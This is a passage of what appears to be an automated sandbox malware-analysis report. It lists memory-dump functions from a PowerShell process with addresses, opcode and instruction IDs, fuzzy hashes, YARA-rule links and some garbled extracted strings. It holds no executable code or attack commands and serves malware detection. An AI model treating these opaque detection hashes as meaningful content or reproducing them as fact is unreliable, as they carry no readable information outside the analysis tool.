                                                                            • Instruction Fuzzy Hash: 13020C74A00204DFDB94CF99C595EAEBBF2AF84304F14C469D91A5B35ACB72EC42CB91
                                                                            Function 06DB14DC Relevance: .4, Instructions: 404COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f91c34235a6a76c8c9b037707295a1db85d4e94c7d657c0f8f3675154af1b8f2
                                                                            • Instruction ID: d76b675cb962b10ac48178782f6c9f71da0d866bb47ef50350bb3427ef58d0dd
                                                                            • Opcode Fuzzy Hash: f91c34235a6a76c8c9b037707295a1db85d4e94c7d657c0f8f3675154af1b8f2
                                                                            • Instruction Fuzzy Hash: 98F14C74B00204DFDB54CB98C991FAABBB2AF85354F14C059E9069F35ACB72ED42CB91
                                                                            Function 06DB1017 Relevance: .4, Instructions: 377COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7bc53a28e2d000b6583e0e824c5860d91586d78865cfe2ce364accec3d116f83
                                                                            • Instruction ID: acd10377d3c1a50d198e8ba50002d905afec566ed0aa041da1ceded16af2ef6a
                                                                            • Opcode Fuzzy Hash: 7bc53a28e2d000b6583e0e824c5860d91586d78865cfe2ce364accec3d116f83
                                                                            • Instruction Fuzzy Hash: 10F14D74A00204DFDB54CF98C991EAABBF2BF89354F14C159E90A9B359C732EC42CB91
                                                                            Function 06DB12AE Relevance: .3, Instructions: 346COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c2afcf36c7cb5b3e3ae75b8a603afb29bbc5720d316acc989ed6f78ac86ce037
                                                                            • Instruction ID: 8c9cb757dcc7456b9875b83cbb76984cf8a8c412a1f547e5433c499cd25527d5
                                                                            • Opcode Fuzzy Hash: c2afcf36c7cb5b3e3ae75b8a603afb29bbc5720d316acc989ed6f78ac86ce037
                                                                            • Instruction Fuzzy Hash: 82E12C74B00204DFDB54CB98C991E9ABBB2FF89354F14C059E9069B35ACB72ED42CB91
                                                                            Function 00BF8CC0 Relevance: .3, Instructions: 321COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2955802932.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_bf0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d383ad9010150bccf0b4e617802d427ec34d49c572105a5280fd4f9eef41658f
                                                                            • Instruction ID: bb526aa67731b0f20c53d332aacb5779d88a7ef66a023e4344c32a4d119597c2
                                                                            • Opcode Fuzzy Hash: d383ad9010150bccf0b4e617802d427ec34d49c572105a5280fd4f9eef41658f
                                                                            • Instruction Fuzzy Hash: 02C18135A00208DFDB14DFA4D944AADBBF6FF85314F1185A9E906AB365CB34ED49CB80
                                                                            Function 00BF31C8 Relevance: .3, Instructions: 310COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2955802932.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_bf0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 49f9794c12260df4839f43126966d36991be20593afbcb6d15872dd78249e4d6
                                                                            • Instruction ID: 696f59a76108b51bc96fba54ff1f7fe3b721d150676680c91903c8d6251023a9
                                                                            • Opcode Fuzzy Hash: 49f9794c12260df4839f43126966d36991be20593afbcb6d15872dd78249e4d6
                                                                            • Instruction Fuzzy Hash: 80D10B74A01209DFCB05CFA8D584AADFBF2EF88710F258199E905AB365C731EE45CB90
                                                                            Function 06DB5B30 Relevance: .3, Instructions: 275COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 04ea31d351e6066275c7d626ad321a9503090cef100afc3f9ffea3ea23236405
                                                                            • Instruction ID: 42313bb27906ec7ad3f1f8be40b6d96544fdf790802ea515c4bb6b5258b3662e
                                                                            • Opcode Fuzzy Hash: 04ea31d351e6066275c7d626ad321a9503090cef100afc3f9ffea3ea23236405
                                                                            • Instruction Fuzzy Hash: 01B16070B00204DFD754DF68D555B9EBBE3AB88300F148169E906AF359CB72EC86CBA5
                                                                            Function 00BFF1F2 Relevance: .3, Instructions: 260COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2955802932.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_bf0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 27c88bf66e2c180cff6b23ebe7850869ce1f971e9d67d98ef87455da5d100f4c
                                                                            • Instruction ID: dc690e0734254ffb4eb75ce80ed26f4b727142d9beb24aecf651dcf1eca44510
                                                                            • Opcode Fuzzy Hash: 27c88bf66e2c180cff6b23ebe7850869ce1f971e9d67d98ef87455da5d100f4c
                                                                            • Instruction Fuzzy Hash: A9A13970E0020E8FDB10DFA8D8957BDBBF1EF48314F248179E919A7294EB749849CB85
                                                                            Function 06DB5B10 Relevance: .3, Instructions: 255COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 85df74f6ef665e742a173f0b2d884a16be9b4d474e1f832a6ccaf66e3e5f9817
                                                                            • Instruction ID: 850db51ce42624b1005026fc9b76412db07ef19d377e1aa0417246892c50de89
                                                                            • Opcode Fuzzy Hash: 85df74f6ef665e742a173f0b2d884a16be9b4d474e1f832a6ccaf66e3e5f9817
                                                                            • Instruction Fuzzy Hash: BDA18F70A00204DFD754CF54D585B9EBBF2AF88304F148069E906AF369CB76EC86CBA5
                                                                            Function 00BF8528 Relevance: .2, Instructions: 202COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2955802932.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_bf0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 60aff4e7aab478f95d60966b91bc90c702cef0e4d6616f77dad1ca204b32e5a2
                                                                            • Instruction ID: e35b9598ce90f4467d0a0a1a2dbc2a6b5edc90d6879e25915915618e75ff0f3a
                                                                            • Opcode Fuzzy Hash: 60aff4e7aab478f95d60966b91bc90c702cef0e4d6616f77dad1ca204b32e5a2
                                                                            • Instruction Fuzzy Hash: 3F818D34A05208AFCB15DFA8D8849ADBBF6FF89350B2484A9E5059B362DB35DC85CB50
                                                                            Function 00BF9488 Relevance: .2, Instructions: 192COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2955802932.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_bf0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a61022fe78c62ecd777ad0870cee937a4c7fd00c4d0db460970c02bd184b0368
                                                                            • Instruction ID: 36ee1f4f2b780b7031337a61caacd3d3653cc1853b7e04e1e3df7399b5caa3c1
                                                                            • Opcode Fuzzy Hash: a61022fe78c62ecd777ad0870cee937a4c7fd00c4d0db460970c02bd184b0368
                                                                            • Instruction Fuzzy Hash: DA718A30A00209DFCB14DF68D880BAEBBF6FF85354F148569E4099B661DB75EC4ACB80
                                                                            Function 00BF95F6 Relevance: .2, Instructions: 188COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2955802932.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_bf0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d9b86a3966f2eabcbce2455ed5d3ae8e039b4c210843f4250b373a0aa530c537
                                                                            • Instruction ID: 8213a60c398450288c88d06c9e09b54d5862dbc36c22cdfc0d360e0c9583c650
                                                                            • Opcode Fuzzy Hash: d9b86a3966f2eabcbce2455ed5d3ae8e039b4c210843f4250b373a0aa530c537
                                                                            • Instruction Fuzzy Hash: FA713C30A00208DFDB15DFB5D494BADBBF6FF88304F148569E515AB2A0DB35AD8ACB40
                                                                            Function 06DBA020 Relevance: .2, Instructions: 182COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 01a45587a092fff307d2eff3dd59b7056f9b83c2dfdbe905c97516a76082d5eb
                                                                            • Instruction ID: 170e75807f6d0d8893ab0a8ef272842b2bf9b837233634ed349ec63ec2e1f6b8
                                                                            • Opcode Fuzzy Hash: 01a45587a092fff307d2eff3dd59b7056f9b83c2dfdbe905c97516a76082d5eb
                                                                            • Instruction Fuzzy Hash: 4D512A31F04315CFD7954B6989016AA7BF2EF81350F1C84AAD9029F35ADB32CD86C7A2
                                                                            Function 00BF3097 Relevance: .1, Instructions: 149COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2955802932.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_bf0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a9e76434bf5d5aa05cb60f24fef97d7bbb6ab979f8dd75473dae8787e9b7aaac
                                                                            • Instruction ID: 6e90a30974a2b8577bd152699200fefb723ad4e65fc02f09ffd2799e29d8790d
                                                                            • Opcode Fuzzy Hash: a9e76434bf5d5aa05cb60f24fef97d7bbb6ab979f8dd75473dae8787e9b7aaac
                                                                            • Instruction Fuzzy Hash: 5951CE7190E3D59FCB02DB2898A05E57FB1AFA7300B0941EBD494DB2A3D629D90DC7B1
                                                                            Function 06DBA01B Relevance: .1, Instructions: 127COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5425ecb23acae7b5a972ade7bc74d50e00cf6b9e988cf16007dc5af4ec1f3762
                                                                            • Instruction ID: cc7ce234dfb32e1330e9e19ebe77b859e1aa9a06be60c940794a1d9a1b5685c3
                                                                            • Opcode Fuzzy Hash: 5425ecb23acae7b5a972ade7bc74d50e00cf6b9e988cf16007dc5af4ec1f3762
                                                                            • Instruction Fuzzy Hash: AE41E730F00201DFDBA48B698941AAA7BF6EB84394F1C8069D9069F259D736CD82C7A1
                                                                            Function 00BF9219 Relevance: .1, Instructions: 116COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2955802932.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_bf0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e4de320cfdc2546fec2a39d295fe9d33c50f4634c7761ea3d72f088e4878cb96
                                                                            • Instruction ID: eb240f25b2dc27de7553651a59e3ddfc6cbf75feae64501e47a8d99d1e3d711f
                                                                            • Opcode Fuzzy Hash: e4de320cfdc2546fec2a39d295fe9d33c50f4634c7761ea3d72f088e4878cb96
                                                                            • Instruction Fuzzy Hash: C5416D316002049FDB14DB64D968BADBBF2FF89715F0980A8E506EB7A0CB389C45CB94
                                                                            Function 00BF9473 Relevance: .1, Instructions: 114COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2955802932.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_bf0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 00ed383b2a1207a127bb0bd8d20a3d0d542b4467ed65546303088f10063128ad
                                                                            • Instruction ID: fed6cf08823e4edd5af1f0c329676086cb1dbb2144fb52ac5db37c84a8f17fc0
                                                                            • Opcode Fuzzy Hash: 00ed383b2a1207a127bb0bd8d20a3d0d542b4467ed65546303088f10063128ad
                                                                            • Instruction Fuzzy Hash: 99414930A00218DFDB15DFA9C8947AEBBF2FF85344F148569D406AB7A4DB75AC45CB80
                                                                            Function 06DB7B7E Relevance: .1, Instructions: 102COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7f38d0d2c0c662579c33541bcb07a400ea67efcfb84a0ff742dea96ce409a6a3
                                                                            • Instruction ID: 392c717826a4a5b640519a57dddb5ca4b7fdc6226109e1646bd43158d5039fb5
                                                                            • Opcode Fuzzy Hash: 7f38d0d2c0c662579c33541bcb07a400ea67efcfb84a0ff742dea96ce409a6a3
                                                                            • Instruction Fuzzy Hash: 01317270B40208DFE7049765C955FAF7AA3ABD4304F108429ED066F3A5CEB6DC468BE5
                                                                            Function 06DB0A78 Relevance: .1, Instructions: 94COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a91580c6c0902926900c9ab060294f5693995432a0d0c3f6f41737fb30e4f4ba
                                                                            • Instruction ID: 9fd7289c3251a858e2ffc480f01b5e6eaaaafc052fbfd19e720a10cfbde73f21
                                                                            • Opcode Fuzzy Hash: a91580c6c0902926900c9ab060294f5693995432a0d0c3f6f41737fb30e4f4ba
                                                                            • Instruction Fuzzy Hash: 5A216E31700315EBD7A45BBAC840F77B6DAABC4715F24883AA54BCB389CD75C941C365
                                                                            Function 00BF317D Relevance: .1, Instructions: 84COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2955802932.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_bf0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: da20ec87811b5fc102fcf919e650fe980a16fa2003b97c83217556db07197053
                                                                            • Instruction ID: 5bd376aa47b62f6149951c3fa98a76e42bb321d10ba03e340789969711f3b25a
                                                                            • Opcode Fuzzy Hash: da20ec87811b5fc102fcf919e650fe980a16fa2003b97c83217556db07197053
                                                                            • Instruction Fuzzy Hash: 53319374A092958FC702DF6CD8909AABFB1EF8A300B1941D6D455DB353C634ED45CBA1
                                                                            Function 06DB0A5C Relevance: .1, Instructions: 79COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b384ecdd40000a05a4a5ee3feb385e509f45e859e9835012d309992af5305d08
                                                                            • Instruction ID: 9c28f86ce10c620a4a3a85f3b0420e586471fe396d0a708d2cc1ae31fd2eaf85
                                                                            • Opcode Fuzzy Hash: b384ecdd40000a05a4a5ee3feb385e509f45e859e9835012d309992af5305d08
                                                                            • Instruction Fuzzy Hash: B6217C30708345AFD7600B668811FA77EE55F85710F14885AA585CF2DAC97DC984C375
                                                                            Function 06DB0868 Relevance: .1, Instructions: 52COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fd6526a961a80e64e065596bcd29f0d86a77093eebbebb5baed2e0de7d85617d
                                                                            • Instruction ID: e37b881214ea93b2c368fc06e3c4ab7a3231c7bc819d767cfaae382ac1219620
                                                                            • Opcode Fuzzy Hash: fd6526a961a80e64e065596bcd29f0d86a77093eebbebb5baed2e0de7d85617d
                                                                            • Instruction Fuzzy Hash: 8F01D43A700215DBD7A4B6AAE4006ABB7A9DBC5222F14843AD586CA654DA32CA45C7E0
                                                                            Function 00BFEC13 Relevance: .0, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2955802932.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_bf0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5998090ba9971508472369914474a7d42b058e56031bb661f0a65622f424cc40
                                                                            • Instruction ID: 27154fba711216358ca419a1ab1d3265548813f0e9dae091e0132e580229ab7d
                                                                            • Opcode Fuzzy Hash: 5998090ba9971508472369914474a7d42b058e56031bb661f0a65622f424cc40
                                                                            • Instruction Fuzzy Hash: 0811D430C1124CCBDF24EA98D5997FCBBF1EB40319F1414A9E121B71A1AB749D8DCB16
                                                                            Function 0070D01D Relevance: .0, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2954957339.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_70d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4e947700c7ae0b2c9e029ee1a2662ed2d1d6463f483b5bddcaab1012e879514c
                                                                            • Instruction ID: e1b90c831b2bf139681d43cbc6dfd893333b2afa365fa8f51fad872faf0d6dde
                                                                            • Opcode Fuzzy Hash: 4e947700c7ae0b2c9e029ee1a2662ed2d1d6463f483b5bddcaab1012e879514c
                                                                            • Instruction Fuzzy Hash: 0301A271509340DAE7208AA9CD84B67BFD8EF41324F18C62AED4C4B2C6C67DDC45C6B1
                                                                            Function 0070D01C Relevance: .0, Instructions: 36COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2954957339.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_70d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b79e2d611822c651d655505e4151f43d346bb6ebcea3a1bfbbfacfb532cb7235
                                                                            • Instruction ID: d8345ad57098aef702ffd244ebde080a8f3bd9c63bb087f80520e40f8c605323
                                                                            • Opcode Fuzzy Hash: b79e2d611822c651d655505e4151f43d346bb6ebcea3a1bfbbfacfb532cb7235
                                                                            • Instruction Fuzzy Hash: 6CF06271405344AEE7208A1ACD84B66FFE8EF51734F18C55AED4C4F286C2799C45CAB1
                                                                            Function 00BF2D5E Relevance: .0, Instructions: 29COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2955802932.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_bf0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e95af3202fc7b7f8662a76e919f2386162b6aa1101998bdf55cf250e72fa5078
                                                                            • Instruction ID: c5c75e103b5ad52dd0b874d6a73b4413b263c176c43ed9cce276a16a06aa87a7
                                                                            • Opcode Fuzzy Hash: e95af3202fc7b7f8662a76e919f2386162b6aa1101998bdf55cf250e72fa5078
                                                                            • Instruction Fuzzy Hash: 83F0DA75A001099FCB15CF9CD990AEEF7B5FF88324F208159E515A72A1C736EC52CB50

                                                                            Non-executed Functions

                                                                            Function 0070D430 Relevance: .1, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2954957339.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_70d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e01544cfc35e3098631c3e003d43f3719e97a332405c684dfbf89892467e5230
                                                                            • Instruction ID: 9af0d8c0d2ca7d1491c5d312673945586f5cc4c307493362d2af5df64859c1b9
                                                                            • Opcode Fuzzy Hash: e01544cfc35e3098631c3e003d43f3719e97a332405c684dfbf89892467e5230
                                                                            • Instruction Fuzzy Hash: 76213371500340DFCB20DF54C9C0B26BFA5FB98324F20C669EC094A296C37AEC56C6A1
                                                                            Function 06DB1B30 Relevance: 14.1, Strings: 11, Instructions: 343COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$4'^q$84l$84l$tP^q$tP^q$t~qq$$^q$$^q$$^q$$^q
                                                                            • API String ID: 0-3681159135
                                                                            • Opcode ID: 520658f3df38da5860aa6db0870a84e00037fce8017afb7ee4a7134c8dc1a628
                                                                            • Instruction ID: aa5c599e949e5e5135dc373fa7d369dcc614a92880b3487afe6361c5b7e6b891
                                                                            • Opcode Fuzzy Hash: 520658f3df38da5860aa6db0870a84e00037fce8017afb7ee4a7134c8dc1a628
                                                                            • Instruction Fuzzy Hash: C4C14531F00204DFDB659B6988207AABBF2AF89310F24847AE446CF359DF31C885C7A1
                                                                            Function 06DB2340 Relevance: 12.8, Strings: 10, Instructions: 299COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                            • API String ID: 0-3512890053
                                                                            • Opcode ID: 2f4c257e7aa04f803f27104efd3094f4b7cd811ce70262cfcda463d8256696a2
                                                                            • Instruction ID: f81c03f749a6e5caa7befc955de04466b5e2795940bce404d37584a0acd14bf1
                                                                            • Opcode Fuzzy Hash: 2f4c257e7aa04f803f27104efd3094f4b7cd811ce70262cfcda463d8256696a2
                                                                            • Instruction Fuzzy Hash: E9A15332B04305CFDBA54B6998107BABBF5AF85310B14846AD446CB35EDF36CA81C7A2
                                                                            Function 06DBD35C Relevance: 11.5, Strings: 9, Instructions: 205COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$84l$84l$tP^q$tP^q$$^q$(dq$(dq$(dq
                                                                            • API String ID: 0-782183648
                                                                            • Opcode ID: eb27980a3ea81b1d8fc152804c85c63f34d3908bc67b3a81350b4acc6c2829d8
                                                                            • Instruction ID: 8b2c445504a611a751bfddc72999455128b4f87f6d2f16b10191bf37473b214d
                                                                            • Opcode Fuzzy Hash: eb27980a3ea81b1d8fc152804c85c63f34d3908bc67b3a81350b4acc6c2829d8
                                                                            • Instruction Fuzzy Hash: 0E71D530E00209DFDB64CF15C544BEABBF3AF89314F299459E8469B299C731ED81CBA1
                                                                            Function 06DB42F0 Relevance: 10.5, Strings: 8, Instructions: 496COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                            • API String ID: 0-3732357466
                                                                            • Opcode ID: 5f50b76664f52bca05f8aef111456cea04ba7a42c561fdfc1f6d5ebbe0e4c3ef
                                                                            • Instruction ID: 0cda0d2fdf3c6fe4e865540715aee8703f96ae8c0acea06d1db7d1c090827eac
                                                                            • Opcode Fuzzy Hash: 5f50b76664f52bca05f8aef111456cea04ba7a42c561fdfc1f6d5ebbe0e4c3ef
                                                                            • Instruction Fuzzy Hash: 12F15435F04345DFDB64CF6984506BABBF2AF85210F28886AD846CB25FDB31C845C7A1
                                                                            Function 06DBD000 Relevance: 10.2, Strings: 8, Instructions: 166COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
